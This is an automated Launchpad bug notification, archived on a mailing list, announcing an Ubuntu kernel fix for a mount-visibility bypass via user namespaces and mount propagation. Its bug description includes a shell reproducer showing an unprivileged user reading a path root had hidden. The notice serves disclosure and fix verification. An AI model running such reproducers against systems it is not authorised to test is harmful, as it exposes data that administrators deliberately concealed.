group.of.nepali.translators team mailing list archive

Thread
Date

[Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

To: group.of.nepali.translators@xxxxxxxxxxxxxxxxxxx
From: Launchpad Bug Tracker <1789161@xxxxxxxxxxxxxxxxxx>
Date: Mon, 03 Dec 2018 08:46:31 -0000
Reply-to: Bug 1789161 <1789161@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

This bug was fixed in the package linux - 3.13.0-163.213

---------------
linux (3.13.0-163.213) trusty; urgency=medium

  * linux: 3.13.0-163.213 -proposed tracker (LP: #1802769)

  * Bypass of mount visibility through userns + mount propagation (LP: #1789161)
    - mount: Retest MNT_LOCKED in do_umount
    - mount: Don't allow copying MNT_UNBINDABLE|MNT_LOCKED mounts

  * dev test in ubuntu_stress_smoke_test cause kernel oops on T-3.13
    (LP: #1797546)
    - drm: fix NULL pointer access by wrong ioctl

  * Packaging resync (LP: #1786013)
    - [Package] add support for specifying the primary makefile

 -- Thadeu Lima de Souza Cascardo <cascardo@xxxxxxxxxxxxx>  Tue, 13 Nov
2018 13:30:30 -0200

** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Cosmic)
       Status: Fix Committed => Fix Released

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18653

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18955

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-6559

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1789161

Title:
  Bypass of mount visibility through userns + mount propagation

Status in linux package in Ubuntu:
  Fix Committed
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in linux source package in Bionic:
  Fix Committed
Status in linux source package in Cosmic:
  Fix Released
Status in linux source package in Disco:
  Fix Committed

Bug description:
  [Impact]

  Jonathan Calmels from NVIDIA reported that he's able to bypass the
  mount visibility security check in place in the Linux kernel by using
  a combination of the unbindable property along with the private mount
  propagation option to allow a unprivileged user to see a path which
  was purposefully hidden by the root user.

  [Test Case]

  Reproducer:
  # Hide a path to all users using a tmpfs
  root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
  root@castiana:~#

  # As an unprivileged user, unshare user namespace and mount namespace
  stgraber@castiana:~$ unshare -U -m -r

  # Confirm the path is still not accessible
  root@castiana:~# ls /sys/devices/

  # Make /sys recursively unbindable and private
  root@castiana:~# mount --make-runbindable /sys
  root@castiana:~# mount --make-private /sys

  # Recursively bind-mount the rest of /sys over to /mnnt
  root@castiana:~# mount --rbind /sys/ /mnt

  # Access our hidden /sys/device as an unprivileged user
  root@castiana:~# ls /mnt/devices/
  breakpoint  cpu  cstate_core  cstate_pkg  i915  intel_pt  isa  kprobe  LNXSYSTM:00  msr  pci0000:00  platform  pnp0  power  software  system  tracepoint  uncore_arb  uncore_cbox_0  uncore_cbox_1  uprobe  virtual

  [Regression Potential]

  Low. The fixes are relatively simple. Regressions would most likely be
  specific to software utilizing user namespaces + mount propagation
  which is a small (but often important) portion of the Ubuntu archive.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions